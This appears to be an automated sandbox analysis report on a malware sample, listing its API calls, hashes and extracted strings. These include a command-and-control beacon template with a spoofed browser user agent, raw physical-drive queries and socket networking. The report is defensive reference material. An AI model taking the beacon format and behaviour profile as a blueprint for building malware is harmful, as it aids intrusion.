                                                                            • _malloc.LIBCMT ref: 02AD6663
                                                                            • _malloc.LIBCMT ref: 02AD6689
                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02AD669C
                                                                            • Sleep.KERNELBASE ref: 02AD66AA
                                                                            • _malloc.LIBCMT ref: 02AD66B6
                                                                            • _malloc.LIBCMT ref: 02AD66C3
                                                                            • _memset.LIBCMT ref: 02AD66D8
                                                                            • _memset.LIBCMT ref: 02AD66E8
                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02AD6704
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD670F
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD6720
                                                                            • _memset.LIBCMT ref: 02AD6775
                                                                            • _memset.LIBCMT ref: 02AD6784
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                            • API String ID: 2251652938-2678694477
                                                                            • Opcode ID: 3a1dae4870274359b582af4fc306a317b735a1df1fc94132d4c7cabb9a4745bd
                                                                            • Instruction ID: 63cca5ce762bcca05c44354e5fe28e71aca129e6ad59c5a95a2f384ca517903c
                                                                            • Opcode Fuzzy Hash: 3a1dae4870274359b582af4fc306a317b735a1df1fc94132d4c7cabb9a4745bd
                                                                            • Instruction Fuzzy Hash: 94719371D84350AFE710AF749D45B5BBBECAF49710F000819FA9697290DFB8A841CF96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

Control-flow Graph
[Rendered as a figure; only the text residue survived. Recoverable information: function spanning 401b4b-401c25, calling LoadLibraryA, GetProcAddress, GetAdaptersInfo and FreeLibrary.]
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                            • API String ID: 514930453-3667123677
                                                                            • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                            • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                            • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

Control-flow Graph
[Rendered as a figure; only the text residue survived. Recoverable information: function spanning 2adf8da-2adf9c4, calling LoadLibraryA, GetProcAddress, GetAdaptersInfo and FreeLibrary.]
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02ADF8F0
                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02ADF909
                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02ADF92E
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02ADF9B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                            • API String ID: 514930453-3114217049
                                                                            • Opcode ID: f2aec93acc4c9067aa9ea80c3058fc432f97bf71c34a405b41f3b0789ec68051
                                                                            • Instruction ID: 3f315312018de17dd325cb20c7637d5900509defcce49841784a02f7173404ac
                                                                            • Opcode Fuzzy Hash: f2aec93acc4c9067aa9ea80c3058fc432f97bf71c34a405b41f3b0789ec68051
                                                                            • Instruction Fuzzy Hash: 4E216F71E04209BFDB10DFA898C46EFBBB9AF05314F1444AAE947E7A01DF349945CAA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

Control-flow Graph
[Rendered as a figure; only the text residue survived. Recoverable information: function spanning 2adf7d6-2adf8d9, calling CreateFileA, DeviceIoControl, GetLastError and FindCloseChangeNotification.]
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02ADF7F5
                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02ADF833
                                                                            • GetLastError.KERNEL32 ref: 02ADF894
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 02ADF8CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 3786717961-1180397377
                                                                            • Opcode ID: 812e6dc4704d21b536e8bc4fbcfe5798aed3f77ef1c2747491683caf2f815002
                                                                            • Instruction ID: b55dbcd72aba741d3dde4273bc249c4bf2d4bfa5758d914fac79eeb45104f4b0
                                                                            • Opcode Fuzzy Hash: 812e6dc4704d21b536e8bc4fbcfe5798aed3f77ef1c2747491683caf2f815002
                                                                            • Instruction Fuzzy Hash: 2331A071D8021AAFDF14CF95D884BAFBBB9FF05714F20416AE507A7A80DB709A05CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

Control-flow Graph
[Rendered as a figure; only the text residue survived. Recoverable information: function spanning 401a4f-401b4a, calling CreateFileA, DeviceIoControl, GetLastError and FindCloseChangeNotification.]
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                            • String ID: \\.\PhysicalDrive0
                                                                            • API String ID: 3786717961-1180397377
                                                                            • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                            • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                            • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

Control-flow Graph
[Rendered as a figure; only the text residue survived. Recoverable information: function spanning 2ad62ca-2ad7b52, calling GetModuleHandleA, GetProcAddress, GetTickCount, GetVersionExA, GetProcessHeap, RtlAllocateHeap, RtlEnterCriticalSection, RtlLeaveCriticalSection, QueryPerformanceCounter, Sleep, InternetOpenA, InternetSetOptionA, InternetOpenUrlA, InternetReadFile and InternetCloseHandle.]
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                            • API String ID: 0-2678694477
                                                                            • Opcode ID: 0fd2400681456923b8f825058459f446e674b388a133d5275feba55468b0e750
                                                                            • Instruction ID: c956d72400694d90ad63bf2eb48853f25a929679594d1b4c5ddd839349a52255
                                                                            • Opcode Fuzzy Hash: 0fd2400681456923b8f825058459f446e674b388a133d5275feba55468b0e750
                                                                            • Instruction Fuzzy Hash: 08C157719483809FE311AF74AC49B9BBFADEF4A710F14085EE5868B241DF749842CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02AD1D11
                                                                            • GetLastError.KERNEL32 ref: 02AD1D23
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02AD1D59
                                                                            • GetLastError.KERNEL32 ref: 02AD1D6B
                                                                            • __beginthreadex.LIBCMT ref: 02AD1DB1
                                                                            • GetLastError.KERNEL32 ref: 02AD1DC6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD1DDD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD1DEC
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02AD1E14
                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02AD1E1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                            • API String ID: 4246062733-3017686385
                                                                            • Opcode ID: 9bd4c07aac49dbbb6bcd2bbc4ed155065d74238085d73b809bc7c1f6295d9471
                                                                            • Instruction ID: 7a498c8c5f701f298287a62d8ed8f4083edafd8e441aef866906a12f9f3ead9d
                                                                            • Opcode Fuzzy Hash: 9bd4c07aac49dbbb6bcd2bbc4ed155065d74238085d73b809bc7c1f6295d9471
                                                                            • Instruction Fuzzy Hash: 93316B719403059FDB00EF60C888B2BBBA5FF84754F104969F95A9B290EF74994ACF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD4D8B
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD4DB7
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD4DC3
                                                                              • Part of subcall function 02AD4BED: __EH_prolog.LIBCMT ref: 02AD4BF2
                                                                              • Part of subcall function 02AD4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02AD4CF2
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD4E93
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD4E99
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD4EA0
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD4EA6
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD50A7
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD50AD
                                                                            • RtlEnterCriticalSection.NTDLL(02B071B8), ref: 02AD50B8
                                                                            • RtlLeaveCriticalSection.NTDLL(02B071B8), ref: 02AD50C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 2062355503-0
                                                                            • Opcode ID: 0dcee8eaf3cdd79743ae16b1dc7e0623dae86a2fe8383a3c0d973ec1b889c69a
                                                                            • Instruction ID: 606975e4be6c4adfee13a39330e73a2c1b1c9db4345a736ea21782d9b8fb1d27
                                                                            • Opcode Fuzzy Hash: 0dcee8eaf3cdd79743ae16b1dc7e0623dae86a2fe8383a3c0d973ec1b889c69a
                                                                            • Instruction Fuzzy Hash: 0BB13B71D4025DEFEF15DFA0C984BEDBBB5AF04314F54409AE80666280DF785A49CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                            • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                            • String ID:
                                                                            • API String ID: 564119183-0
                                                                            • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                            • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD2706
                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02AD272B
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02AF5A93), ref: 02AD2738
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02AD2778
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD27D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                            • String ID: timer
                                                                            • API String ID: 4293676635-1792073242
                                                                            • Opcode ID: 9f72710f4271b7754cc0b06282063ec4fe2fb4257f0df566982b29aee02f9034
                                                                            • Instruction ID: 13c92d9b7f3f1b8a7e4419a31965de4298b97a38b245ce0095ecc97c6183ae3e
                                                                            • Opcode Fuzzy Hash: 9f72710f4271b7754cc0b06282063ec4fe2fb4257f0df566982b29aee02f9034
                                                                            • Instruction Fuzzy Hash: 77316BB1944705EFD360DF65C984B26BBE8FB48724F004A2EF95683A80DB74D811CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2BE4
                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02AD2C07
                                                                              • Part of subcall function 02ADA43C: WSAGetLastError.WS2_32(00000000,?,?,02AD2A51), ref: 02ADA44A
                                                                            • WSASetLastError.WS2_32 ref: 02AD2CD3
                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02AD2CE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Recvselect
                                                                            • String ID: 3'
                                                                            • API String ID: 886190287-280543908
                                                                            • Opcode ID: 2092e86580cd145e0f0559ae66a92a1a73afda5040eb7b000a577b74ae3018eb
                                                                            • Instruction ID: 3b3b31b7813d2c2b97fa5f4c01f56c15c95b85393ec4a95fc02fdcac65cf5d4a
                                                                            • Opcode Fuzzy Hash: 2092e86580cd145e0f0559ae66a92a1a73afda5040eb7b000a577b74ae3018eb
                                                                            • Instruction Fuzzy Hash: F84149B19443058FDB20AF64C94476BBAE9AF84354F10091EE89BD7281EFB4D941CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 00402F48
                                                                              • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                              • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                            • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                              • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                            • String ID: 6x
                                                                            • API String ID: 2057626494-281999241
                                                                            • Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
                                                                            • Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD2A3B
                                                                            • closesocket.WS2_32 ref: 02AD2A42
                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02AD2A89
                                                                            • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02AD2A97
                                                                            • closesocket.WS2_32 ref: 02AD2A9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                            • String ID:
                                                                            • API String ID: 1561005644-0
                                                                            • Opcode ID: 751bb92c44179c006008cc58d1b8719c45ae0e28ea3842972d304f0895ec108f
                                                                            • Instruction ID: 4677979be697335ad48e8d2b75756a7d4c14730d47be89013aa986cbd9019254
                                                                            • Opcode Fuzzy Hash: 751bb92c44179c006008cc58d1b8719c45ae0e28ea3842972d304f0895ec108f
                                                                            • Instruction Fuzzy Hash: 14212BB1940205ABEB20ABF8CA48B6AB7E9EF44315F104969ED17D3252EF74CD45CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD1BAC
                                                                            • RtlEnterCriticalSection.NTDLL ref: 02AD1BBC
                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02AD1BEA
                                                                            • RtlEnterCriticalSection.NTDLL ref: 02AD1C13
                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02AD1C56
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                            • String ID:
                                                                            • API String ID: 1633115879-0
                                                                            • Opcode ID: e5662efc7b8a5d10fe9e0417dedacf3c251d1fdb5539b6d87bb7a161031d028f
                                                                            • Instruction ID: 3358f0340a7784fca312331f04f933b6606297ce0c930e2d1d78b8859bbce45a
                                                                            • Opcode Fuzzy Hash: e5662efc7b8a5d10fe9e0417dedacf3c251d1fdb5539b6d87bb7a161031d028f
                                                                            • Instruction Fuzzy Hash: 9D21AE75A00204DFDB14CFA8C984B9ABBB5FF48714F108989ED1A97701DB74E901CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000), ref: 02AD2EEE
• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02AD2EFD
• WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02AD2F0C
• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02AD2F36
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Socketsetsockopt
• String ID:
• API String ID: 2093263913-0
• Opcode ID: 8f0f03bb8ba3c79157bbfe61cfb1292eca616c0933d6e5a66be449dda5e2255c
• Instruction ID: ac349f725b9e2417c008f1d593ac5fb1a2f001cac2fa9329e651470095183874
• Opcode Fuzzy Hash: 8f0f03bb8ba3c79157bbfe61cfb1292eca616c0933d6e5a66be449dda5e2255c
• Instruction Fuzzy Hash: 4B018871940204BBDB205FA5DC88F5AFBA9EB89761F008965FA19DB181DB74C801CBB0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02AD2D39: WSASetLastError.WS2_32(00000000), ref: 02AD2D47
  • Part of subcall function 02AD2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02AD2D5C
• WSASetLastError.WS2_32(00000000), ref: 02AD2E6D
• select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02AD2E83
Strings
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Sendselect
• String ID: 3'
• API String ID: 2958345159-280543908
• Opcode ID: af0cab9580b31422fa4d22e563d58d690a8b5137d019b856655c03387316d6fd
• Instruction ID: 23257c46e1a85949acf8e11bb8a1838d30fbc593e12c857abf7584d164c75d62
• Opcode Fuzzy Hash: af0cab9580b31422fa4d22e563d58d690a8b5137d019b856655c03387316d6fd
• Instruction Fuzzy Hash: 5E316DB1A003099BDF10EFB4C944BEEBBAAAF44324F00455ADC5AD7241EFB59555CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000), ref: 02AD2AEA
• connect.WS2_32(?,?,?), ref: 02AD2AF5
Strings
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: ErrorLastconnect
• String ID: 3'
• API String ID: 374722065-280543908
• Opcode ID: 4e5deaa4b315a2876c2fe71527036fd8f829c6499b4d58724abe6115bc0324a4
• Instruction ID: 418af7dceb2990d7c98a8b36f92f6f4bddfd1262940aa2087af634aa99ff5385
• Opcode Fuzzy Hash: 4e5deaa4b315a2876c2fe71527036fd8f829c6499b4d58724abe6115bc0324a4
• Instruction Fuzzy Hash: 3F21AA74E001049BDF10EFB4C5447ADBBBAAF44324F004599DD1AA7281DFB45906CF91
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 7fff3219f6052e1217ad0dc370d254bd3a0cdd97b3f4478ecb6b014b08ba001c
• Instruction ID: 7943b8268c018a241ed573257060046febe82c1a76cd627392912c3713f61424
• Opcode Fuzzy Hash: 7fff3219f6052e1217ad0dc370d254bd3a0cdd97b3f4478ecb6b014b08ba001c
• Instruction Fuzzy Hash: DB512EB5905216DFCF05DF68D5406AABBB1FF08720F14819EE82A9B380DB74D911CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedIncrement.KERNEL32(?), ref: 02AD36A7
  • Part of subcall function 02AD2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02AD2432
  • Part of subcall function 02AD2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02AD2445
  • Part of subcall function 02AD2420: RtlEnterCriticalSection.NTDLL(?), ref: 02AD2454
  • Part of subcall function 02AD2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2469
  • Part of subcall function 02AD2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02AD2470
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
• String ID:
• API String ID: 1601054111-0
• Opcode ID: dcce5809dde3ee28e6432afe84c02685f2780d1579f229f477188908a0fb5d0c
• Instruction ID: 05363b4357e9daca1dd2b40cddd5b72026634aedd82b27b76587d476c576c614
• Opcode Fuzzy Hash: dcce5809dde3ee28e6432afe84c02685f2780d1579f229f477188908a0fb5d0c
• Instruction Fuzzy Hash: 7911BFBA100609EBDF219F54CC85BAA3B6AFF40354F104456FE1386290CF34E860CF95
